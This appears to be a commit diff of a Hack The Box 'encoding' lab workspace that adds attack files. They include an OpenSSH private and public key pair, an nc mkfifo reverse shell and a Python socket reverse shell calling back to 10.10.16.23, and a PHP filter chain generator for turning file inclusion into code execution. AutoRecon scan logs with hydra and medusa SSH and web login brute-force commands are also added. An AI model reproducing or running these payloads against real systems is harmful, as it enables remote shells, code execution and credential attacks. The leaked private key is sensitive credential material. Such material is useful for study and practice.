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
-----END OPENSSH PRIVATE KEY-----

1
HTB/encoding/id_rsa.pub Normal file
View File

@@ -0,0 +1 @@
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCWc9s2sCzBfRgudbezHWXtY3jaFMVXBYhKp3HlFSZWZdt1WANd3Mf9kE3EiqoxcTwNbI2nNxX/vyuRTh/YUX+tYfbpZ8WZoj9mb2wZ3mXg1M43aXEA637xpTIFHGlVg1JIr4KRqFDZcM7zsjJLgdXhwpRilo3959r5fKhSbqYqIdRu3JRgYB95tJXFTi6vVR69Kq6WOz4dynOHlYpGGC7+iMENB0pZ3RDpufvlN9EFK7q7+Y4OOOKW9WmkY1YlY2tqvx5Jm9uoyVXnT0TpR3as2ikx6WakRJl8EQagkC8SeEVpjKWy4Lsg8RYyLzb/dXKXtECB5PTM+OqceI8InKQti/GS+xGcgEXF6xkv4CRsdgcSfd/IfXo+nxlmYggk3dZAP9JEk5MOH9+ZbLqvugP66urr6sSpNXRQYOTdheGF6n8tiezNkBnYc1qKcz6LC2kNOvevD4H44fpnxmVrVi8EW8uhA4CyoTYVQd4SlGylvnu4N4pZuSs0tTlxhSG5YEs=

1
HTB/encoding/index.html Normal file
View File

@@ -0,0 +1 @@
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.23 9001 >/tmp/f

10
HTB/encoding/main.py Normal file
View File

File diff suppressed because one or more lines are too long

137
HTB/encoding/php_filter_chain_generator.py Normal file
View File

@@ -0,0 +1,137 @@
#!/usr/bin/env python3
import argparse
import base64
import re
# - Useful infos -
# https://book.hacktricks.xyz/pentesting-web/file-inclusion/lfi2rce-via-php-filters
# https://github.com/wupco/PHP_INCLUDE_TO_SHELL_CHAR_DICT
# https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d
# No need to guess a valid filename anymore
file_to_use = "php://temp"
conversions = {
'0': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2',
'1': 'convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4',
'2': 'convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921',
'3': 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.iconv.IBM868.UTF-16LE',
'4': 'convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE',
'5': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2',
'6': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.CSIBM943.UCS4|convert.iconv.IBM866.UCS-2',
'7': 'convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4',
'8': 'convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
'9': 'convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB',
'A': 'convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213',
'a': 'convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE',
'B': 'convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000',
'b': 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE',
'C': 'convert.iconv.UTF8.CSISO2022KR',
'c': 'convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2',
'D': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213',
'd': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5',
'E': 'convert.iconv.IBM860.UTF16|convert.iconv.ISO-IR-143.ISO2022CNEXT',
'e': 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UTF16.EUC-JP-MS|convert.iconv.ISO-8859-1.ISO_6937',
'F': 'convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB',
'f': 'convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213',
'g': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8',
'G': 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90',
'H': 'convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213',
'h': 'convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE',
'I': 'convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.BIG5.SHIFT_JISX0213',
'i': 'convert.iconv.DEC.UTF-16|convert.iconv.ISO8859-9.ISO_6937-2|convert.iconv.UTF16.GB13000',
'J': 'convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4',
'j': 'convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.iconv.CP950.UTF16',
'K': 'convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE',
'k': 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2',
'L': 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.R9.ISO6937|convert.iconv.OSF00010100.UHC',
'l': 'convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE',
'M': 'convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.iconv.UTF16BE.866|convert.iconv.MACUKRAINIAN.WCHAR_T',
'm': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949',
'N': 'convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4',
'n': 'convert.iconv.ISO88594.UTF16|convert.iconv.IBM5347.UCS4|convert.iconv.UTF32BE.MS936|convert.iconv.OSF00010004.T.61',
'O': 'convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775',
'o': 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-4LE.OSF05010001|convert.iconv.IBM912.UTF-16LE',
'P': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB',
'p': 'convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4',
'q': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.GBK.CP932|convert.iconv.BIG5.UCS2',
'Q': 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500-1983.UCS-2BE|convert.iconv.MIK.UCS2',
'R': 'convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4',
'r': 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.ISO-IR-99.UCS-2BE|convert.iconv.L4.OSF00010101',
'S': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS',
's': 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90',
'T': 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500.L4|convert.iconv.ISO_8859-2.ISO-IR-103',
't': 'convert.iconv.864.UTF32|convert.iconv.IBM912.NAPLPS',
'U': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943',
'u': 'convert.iconv.CP1162.UTF32|convert.iconv.L4.T.61',
'V': 'convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB',
'v': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.ISO-8859-14.UCS2',
'W': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936',
'w': 'convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE',
'X': 'convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932',
'x': 'convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS',
'Y': 'convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361',
'y': 'convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT',
'Z': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16',
'z': 'convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937',
'/': 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4',
'+': 'convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157',
'=': ''
}
def generate_filter_chain(chain, debug_base64=False):
encoded_chain = chain
# generate some garbage base64
filters = "convert.iconv.UTF8.CSISO2022KR|"
filters += "convert.base64-encode|"
# make sure to get rid of any equal signs in both the string we just generated and the rest of the file
filters += "convert.iconv.UTF8.UTF7|"
for c in encoded_chain[::-1]:
filters += conversions[c] + "|"
# decode and reencode to get rid of everything that isn't valid base64
filters += "convert.base64-decode|"
filters += "convert.base64-encode|"
# get rid of equal signs
filters += "convert.iconv.UTF8.UTF7|"
if not debug_base64:
# don't add the decode while debugging chains
filters += "convert.base64-decode"
final_payload = f"php://filter/{filters}/resource={file_to_use}"
return final_payload
def main():
# Parsing command line arguments
parser = argparse.ArgumentParser(description="PHP filter chain generator.")
parser.add_argument("--chain",
help="Content you want to generate. (you will maybe need to pad with spaces for your payload to work)",
required=False)
parser.add_argument("--rawbase64",
help="The base64 value you want to test, the chain will be printed as base64 by PHP, useful to debug.",
required=False)
args = parser.parse_args()
if args.chain is not None:
chain = args.chain.encode('utf-8')
base64_value = base64.b64encode(chain).decode('utf-8').replace("=", "")
chain = generate_filter_chain(base64_value)
print(
"[+] The following gadget chain will generate the following code : {} (base64 value: {})".format(args.chain,
base64_value))
print(chain)
if args.rawbase64 is not None:
rawbase64 = args.rawbase64.replace("=", "")
match = re.search("^([A-Za-z0-9+/])*$", rawbase64)
if (match):
chain = generate_filter_chain(rawbase64, True)
print(chain)
else:
print("[-] Base64 string required.")
exit(1)
if __name__ == "__main__":
main()

1
HTB/encoding/py.py Normal file
View File

@@ -0,0 +1 @@
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.23",9002));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

0
HTB/encoding/results/report/local.txt Normal file
View File

24
HTB/encoding/results/report/notes.txt Normal file
View File

@@ -0,0 +1,24 @@
[*] ssh found on tcp/22.
[*] http found on tcp/80.
[*] ssh found on tcp/22.
[*] http found on tcp/80.
[*] ssh found on tcp/22.
[*] http found on tcp/80.

0
HTB/encoding/results/report/proof.txt Normal file
View File

81
HTB/encoding/results/report/report.md/10.129.123.2/Commands.md Normal file
View File

@@ -0,0 +1,81 @@
```bash
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/results/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_quick_tcp_nmap.xml" 10.129.123.2
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/results/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_full_tcp_nmap.xml" 10.129.123.2
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/results/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_quick_tcp_nmap.xml" 10.129.123.2
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/results/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_full_tcp_nmap.xml" 10.129.123.2
nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/kali/htb/results/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/kali/htb/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml" 10.129.123.2
feroxbuster -u http://10.129.123.2:80/ -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -q -e -o "/home/kali/htb/results/scans/tcp80/tcp_80_http_feroxbuster_directory-list-2.3-medium.txt"
curl -sSikf http://10.129.123.2:80/.well-known/security.txt
curl -sSikf http://10.129.123.2:80/robots.txt
curl -sSik http://10.129.123.2:80/
nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/results/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/kali/htb/results/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.129.123.2
curl -sk -o /dev/null -H "Host: IwDcITnyfroNmHvjuTwI.encoding.htb" http://encoding.htb:80/ -w "%{size_download}"
whatweb --color=never --no-errors -a 3 -v http://10.129.123.2:80 2>&1
wkhtmltoimage --format png http://10.129.123.2:80/ /home/kali/htb/results/scans/tcp80/tcp_80_http_screenshot.png
ffuf -u http://encoding.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.encoding.htb" -fs 1999 -noninteractive -s | tee "/home/kali/htb/results/scans/tcp80/tcp_80_http_encoding.htb_vhosts_subdomains-top1million-110000.txt"
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/results/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_quick_tcp_nmap.xml" 10.129.123.2
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/results/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_full_tcp_nmap.xml" 10.129.123.2
nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/kali/htb/results/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/kali/htb/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml" 10.129.123.2
feroxbuster -u http://10.129.123.2:80/ -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -q -e -o "/home/kali/htb/results/scans/tcp80/tcp_80_http_feroxbuster_directory-list-2.3-medium.txt"
curl -sSikf http://10.129.123.2:80/.well-known/security.txt
curl -sSikf http://10.129.123.2:80/robots.txt
curl -sSik http://10.129.123.2:80/
nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/results/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/kali/htb/results/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.129.123.2
curl -sk -o /dev/null -H "Host: CaVSHfCVQYqVqvUahOxO.haxtables.htb" http://haxtables.htb:80/ -w "%{size_download}"
whatweb --color=never --no-errors -a 3 -v http://10.129.123.2:80 2>&1
wkhtmltoimage --format png http://10.129.123.2:80/ /home/kali/htb/results/scans/tcp80/tcp_80_http_screenshot.png
ffuf -u http://haxtables.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.haxtables.htb" -fs 1999 -noninteractive -s | tee "/home/kali/htb/results/scans/tcp80/tcp_80_http_haxtables.htb_vhosts_subdomains-top1million-110000.txt"
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/results/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_quick_tcp_nmap.xml" 10.129.123.2
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/results/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_full_tcp_nmap.xml" 10.129.123.2
nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/kali/htb/results/scans/_top_100_udp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_top_100_udp_nmap.xml" 10.129.123.2
nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/kali/htb/results/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/kali/htb/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml" 10.129.123.2
feroxbuster -u http://10.129.123.2:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/kali/htb/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt"
curl -sSikf http://10.129.123.2:80/.well-known/security.txt
curl -sSikf http://10.129.123.2:80/robots.txt
curl -sSik http://10.129.123.2:80/
nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/results/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/kali/htb/results/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.129.123.2
curl -sk -o /dev/null -H "Host: JqivbBibaLLbuUZdVXDy.haxtables.htb" http://haxtables.htb:80/ -w "%{size_download}"
whatweb --color=never --no-errors -a 3 -v http://10.129.123.2:80 2>&1
wkhtmltoimage --format png http://10.129.123.2:80/ /home/kali/htb/results/scans/tcp80/tcp_80_http_screenshot.png
ffuf -u http://haxtables.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.haxtables.htb" -fs 1999 -noninteractive -s | tee "/home/kali/htb/results/scans/tcp80/tcp_80_http_haxtables.htb_vhosts_subdomains-top1million-110000.txt"
```

99
HTB/encoding/results/report/report.md/10.129.123.2/Manual Commands.md Normal file
View File

@@ -0,0 +1,99 @@
```bash
[*] ssh on tcp/22
[-] Bruteforce logins:
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "/home/kali/htb/results/scans/tcp22/tcp_22_ssh_hydra.txt" ssh://10.129.123.2
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 22 -O "/home/kali/htb/results/scans/tcp22/tcp_22_ssh_medusa.txt" -M ssh -h 10.129.123.2
[*] http on tcp/80
[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
feroxbuster -u http://10.129.123.2:80 -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -e -o /home/kali/htb/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt
[-] Credential bruteforcing commands (don't run these without modifying them):
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/results/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.129.123.2/path/to/auth/area
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/results/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.129.123.2 -m DIR:/path/to/auth/area
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/results/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.129.123.2/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/results/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.129.123.2 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
[-] (nikto) old but generally reliable web server enumeration tool:
nikto -ask=no -h http://10.129.123.2:80 2>&1 | tee "/home/kali/htb/results/scans/tcp80/tcp_80_http_nikto.txt"
[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
wpscan --url http://10.129.123.2:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/kali/htb/results/scans/tcp80/tcp_80_http_wpscan.txt"
[*] ssh on tcp/22
[-] Bruteforce logins:
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "/home/kali/htb/results/scans/tcp22/tcp_22_ssh_hydra.txt" ssh://10.129.123.2
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 22 -O "/home/kali/htb/results/scans/tcp22/tcp_22_ssh_medusa.txt" -M ssh -h 10.129.123.2
[*] http on tcp/80
[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
feroxbuster -u http://10.129.123.2:80 -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -e -o /home/kali/htb/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt
[-] Credential bruteforcing commands (don't run these without modifying them):
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/results/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.129.123.2/path/to/auth/area
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/results/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.129.123.2 -m DIR:/path/to/auth/area
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/results/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.129.123.2/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/results/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.129.123.2 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
[-] (nikto) old but generally reliable web server enumeration tool:
nikto -ask=no -h http://10.129.123.2:80 2>&1 | tee "/home/kali/htb/results/scans/tcp80/tcp_80_http_nikto.txt"
[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
wpscan --url http://10.129.123.2:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/kali/htb/results/scans/tcp80/tcp_80_http_wpscan.txt"
[*] ssh on tcp/22
[-] Bruteforce logins:
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "/home/kali/htb/results/scans/tcp22/tcp_22_ssh_hydra.txt" ssh://10.129.123.2
